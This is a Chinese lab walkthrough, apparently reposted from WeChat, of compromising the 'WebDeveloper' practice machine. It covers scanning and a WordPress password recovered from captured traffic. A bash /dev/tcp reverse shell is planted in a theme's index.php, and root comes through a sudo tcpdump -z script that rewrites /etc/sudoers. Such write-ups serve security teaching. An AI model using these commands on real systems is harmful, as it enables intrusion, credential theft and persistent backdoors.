WebDeveloper
信息收集:发现目标
发现主机
使用 nmap 扫描局域网内活跃主机:
nmap -sP 192.168.20.0/24
发现目标IP:192.168.20.106。
端口与服务探测
进一步扫描目标开放的端口及服务版本:
nmap -sV -p- 192.168.20.106
发现服务:
-
22/tcp:OpenSSH 7.6p1
-
80/tcp:Apache httpd 2.4.29
Web渗透:突破WordPress
访问Web服务
打开 http://192.168.20.106,发现网站基于 WordPress 框架。
枚举目录
使用 dirb扫描隐藏目录:
dirb http://192.168.20.106/
发现目录:
http://192.168.20.106/ipdata/
http://192.168.20.106/wp-admin/
http://192.168.20.106/wp-content/
http://192.168.20.106/wp-includes/
访问/ipdata/目录
发现文件:
-
/ipdata/analyze.cap(流量文件)
流量分析
下载 analyze.cap 并分析,发现一条HTTP登录请求: 发现登录行为:
180 90.210143 192.168.1.222 192.168.1.176 HTTP 799 POST /wordpress/wp-login.php HTTP/1.1 (application/x-www-form-urlencoded)
追踪HTTP流:
POST /wordpress/wp-login.php
用户名:webdeveloper
密码(URL解码后):Te5eQg&4sBS!Yr$wf%(DcAd
登录WordPress后台
http://192.168.20.106/wp-login.php
用户:webdeveloper
密码:Te5eQg&4sBS!Yr$)wf%(DcAd
发现上传点:
http://192.168.20.106/wp-admin/upload.php
http://192.168.20.106/wp-admin/theme-install.php?browse=featured
反弹Shell:获取系统权限
植入恶意代码
点击"Appearance">"Editor">在"Select theme to edit"选择"Twenty Fifteen">点击"Select">在"Theme Files"找到"index.php"编辑
通过编辑主题文件 Twenty Fifteen 的 index.php,插入反弹Shell代码:
system("bash -c 'sh -i &>/dev/tcp/192.168.20.100/8888 0>&1'");
更新文件:"Update File"
点击"Appearance">"Themes">选择"Twenty Fifteen">点击"Activate"
监听端口
nc -nlvvp 8888
触发shell
访问http://192.168.20.106/index.php
反弹成功
提权
查找敏感配置
find /var/www/html -name "*config*" 2>/dev/null
在网站根目录发现 wp-config.php
网站根目录配置:
/var/www/html/wp-config.php
泄露数据库凭据
cat /var/www/html/wp-config.php
用户:webdeveloper
密码:MasterOfTheUniverse
ssh登录
ssh [email protected]
登录成功
利用sudo漏洞提权
sudo -l
发现可执行 tcpdump 命令。
(root) /usr/sbin/tcpdump
编写payload
vi /tmp/exp
#! /bin/bash
chmod 777 /etc/sudoers && echo"webdeveloper ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers
chmod 777 /tmp/exp
执行tcpdump命令
通过 tcpdump 触发脚本:
sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exp -Z root
查看sudo特权
sudo -l
-
(root) /usr/sbin/tcpdump -
(root) NOPASSWD: ALL
sudo su
id
-
uid=0(root) gid=0(root) groups=0(root)
红队全栈教学
可在公众号回复“红队”获取群链接
原文始发于微信公众号(泷羽Sec-Ceo):WebDeveloper靶机:从Web渗透到Root提权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论